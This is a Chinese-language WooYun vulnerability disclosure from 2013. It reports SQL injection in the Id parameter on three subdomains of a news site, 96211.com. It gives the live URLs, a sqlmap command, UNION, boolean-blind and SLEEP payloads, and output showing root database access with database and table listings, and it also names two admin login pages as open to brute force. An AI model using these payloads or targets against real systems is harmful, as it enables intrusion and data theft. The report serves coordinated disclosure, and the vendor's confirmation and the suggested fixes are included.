漏洞概要 关注数(2) 关注此漏洞
缺陷编号: WooYun-2013-44193
漏洞标题: 大河网#3个分站存在SQL注射漏洞(root用户)
相关厂商: 大河网
漏洞作者: Mr.leo
提交时间: 2013-11-27 13:42
公开时间: 2014-01-11 13:43
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 20
漏洞状态: 厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org
Tags标签: 注射技巧
漏洞详情
披露状态:
2013-11-27: 细节已通知厂商并且等待厂商处理中
2013-11-27: 厂商已经确认,细节仅向厂商公开
2013-12-07: 细节向核心白帽子及相关领域专家公开
2013-12-17: 细节向普通白帽子公开
2013-12-27: 细节向实习白帽子公开
2014-01-11: 细节向公众公开
简要描述:
大河网#3个分站存在SQL注射漏洞(root用户) 求RANK20
详细说明:
站点1:
http://jlb.96211.com 大河读者报俱乐部
id参数没有过滤,导致注射漏洞
http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398
sqlmap跑起来
sqlmap.py -u "http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=398 AND 9028=9028
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: Id=398 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x
3a626f623a,0x4e584145674d79756773,0x3a6474613a), NULL, NULL, NULL, NULL, NULL, N
ULL, NULL#
---
[10:40:01] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5
[10:40:01] [INFO] fetching current user
current user: 'root@localhost'
[10:40:01] [INFO] fetching current database
current database: 'dahebao'
[10:40:01] [INFO] fetching database names
[10:40:01] [INFO] the SQL query used returns 17 entries
[10:40:01] [INFO] resumed: "information_schema"
[10:40:01] [INFO] resumed: "170"
[10:40:01] [INFO] resumed: "clubwap"
[10:40:01] [INFO] resumed: "cmswap"
[10:40:01] [INFO] resumed: "dahebao"
[10:40:01] [INFO] resumed: "dahevote"
[10:40:01] [INFO] resumed: "dvote"
[10:40:01] [INFO] resumed: "dvote_2"
[10:40:01] [INFO] resumed: "ebvote"
[10:40:01] [INFO] resumed: "guozheng"
[10:40:01] [INFO] resumed: "love"
[10:40:01] [INFO] resumed: "mysql"
[10:40:01] [INFO] resumed: "php168"
[10:40:01] [INFO] resumed: "phpcms"
[10:40:01] [INFO] resumed: "phpcms2010"
[10:40:01] [INFO] resumed: "test"
[10:40:01] [INFO] resumed: "tuan"
root用户
available databases [17]:
[*] 170
[*] clubwap
[*] cmswap
[*] dahebao
[*] dahevote
[*] dvote
[*] dvote_2
[*] ebvote
[*] guozheng
[*] information_schema
[*] love
[*] mysql
[*] php168
[*] phpcms
[*] phpcms2010
[*] test
[*] tuan
Database: dahebao
[48 tables]
+----------------+
| about_m |
| adm |
| am_tree |
| am_user |
| ar_advertise |
| ar_article |
| ar_articledata |
| ar_articletype |
| ar_catalog |
| ar_comment |
| ar_config |
| ar_file |
| ar_keywords |
| ar_links |
| ar_members |
| ar_message |
| ar_page |
| ar_tags |
| areas |
| baoliao |
| baoming |
| buycar_m |
| emaillm |
| emailsm |
| gmm |
| gmyes |
| hzshm |
| hzshs |
| jiuyou |
| kefu_m |
| keywd |
| link_m |
| liren |
| liuyan_text |
| mem_m |
| mem_store |
| news_m |
| pinpm |
| prodm |
| prodmpic |
| prodmpl |
| prodmtao |
| prodmwd |
| prods |
| toorder_m |
| toorderlw |
| wenda |
| xiaojizhe |
+----------------+
------------------------我是分割线----------------------------------
站点2:
http://dhtuan.96211.com 国政大河商城
同样是id参数没有过滤,导致注射漏洞
http://dhtuan.96211.com/Previous/SiteProd/ProdM_List.php?Id=432
跑sqlmap
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=432 AND 9896=9896
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: Id=432 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6a617a3a,0x6a696253766
74c76434e,0x3a6e68663a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: Id=432 AND SLEEP(5)
---
[12:42:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
[12:42:09] [INFO] fetching current user
current user: 'root@localhost'
[12:42:09] [INFO] fetching current database
current database: 'guozheng'
[12:42:09] [INFO] fetching database names
[12:42:09] [INFO] the SQL query used returns 17 entries
[12:42:09] [INFO] resumed: "information_schema"
[12:42:09] [INFO] resumed: "170"
[12:42:10] [INFO] resumed: "clubwap"
[12:42:10] [INFO] resumed: "cmswap"
[12:42:10] [INFO] resumed: "dahebao"
[12:42:10] [INFO] resumed: "dahevote"
[12:42:10] [INFO] resumed: "dvote"
[12:42:10] [INFO] resumed: "dvote_2"
[12:42:10] [INFO] resumed: "ebvote"
[12:42:10] [INFO] resumed: "guozheng"
[12:42:10] [INFO] resumed: "love"
[12:42:10] [INFO] resumed: "mysql"
[12:42:10] [INFO] resumed: "php168"
[12:42:10] [INFO] resumed: "phpcms"
[12:42:10] [INFO] resumed: "phpcms2010"
[12:42:10] [INFO] resumed: "test"
[12:42:10] [INFO] resumed: "tuan"
同样是root用户
available databases [17]:
[*] 170
[*] clubwap
[*] cmswap
[*] dahebao
[*] dahevote
[*] dvote
[*] dvote_2
[*] ebvote
[*] guozheng
[*] information_schema
[*] love
[*] mysql
[*] php168
[*] phpcms
[*] phpcms2010
[*] test
[*] tuan
Database: guozheng
[35 tables]
+--------------+
| about_m |
| adm |
| am_tree |
| am_user |
| areas |
| baoming |
| buycar_m |
| buycar_m_jf |
| emaillm |
| emailsm |
| gmm |
| gmyes |
| hzshm |
| hzshs |
| kefu_m |
| keywd |
| link_m |
| liuyan_text |
| mem_m |
| mem_store |
| news_m |
| pinpm |
| prodm |
| prodm_jf |
| prodmpic |
| prodmpic_jf |
| prodmpl |
| prodmtao |
| prodmwd |
| prods |
| prods_jf |
| toorder_m |
| toorder_m_jf |
| toorderlw |
| wenda |
+--------------+
------------------------------我是分割线-------------------------------
站点3:
http://pw.96211.com 大河票务在线
id没有过滤,导致注射
http://pw.96211.com/Previous/SiteProd/ProdM_List_yc.php?Id=248
sqlmap跑起来
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=248 AND 4067=4067
---
[11:06:38] [INFO] testing MySQL
[11:06:51] [INFO] confirming MySQL
[11:07:13] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[11:07:13] [INFO] fetching current user
[11:07:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[11:07:13] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[11:26:31] [INFO] fetching current database
[11:26:31] [INFO] retrieved: dahebao
current database: 'dahebao'
[11:36:11] [INFO] fetching database names
[11:36:11] [INFO] fetching number of databases
[11:36:11] [INFO] retrieved: 17
[11:37:51] [INFO] retrieved: information_schema
[12:01:25] [INFO] retrieved: 170
[12:06:14] [INFO] retrieved: clubwap
[12:16:03] [INFO] retrieved: cmswap
[12:24:34] [INFO] retrieved: dahebao
[12:34:16] [INFO] retrieved: dahevote
太慢了,没有深入。
root用户
附送2个后台,没有验证码,没有深入,存在被暴力破解。
http://dhfx.96211.com/Admin/Frame/LoginA.php
大河报读者俱乐部 96211 - 管理员入口
http://t.96211.com/manage/login.php
大河团 - 管理后台
漏洞证明:
已经证明。
修复方案:
1#过滤参数
2#屏蔽外网直接访问到管理后台
3#找洞很辛苦,求RANK20
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2013-11-27 13:44
厂商回复:
通知了合作单位。谢谢
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值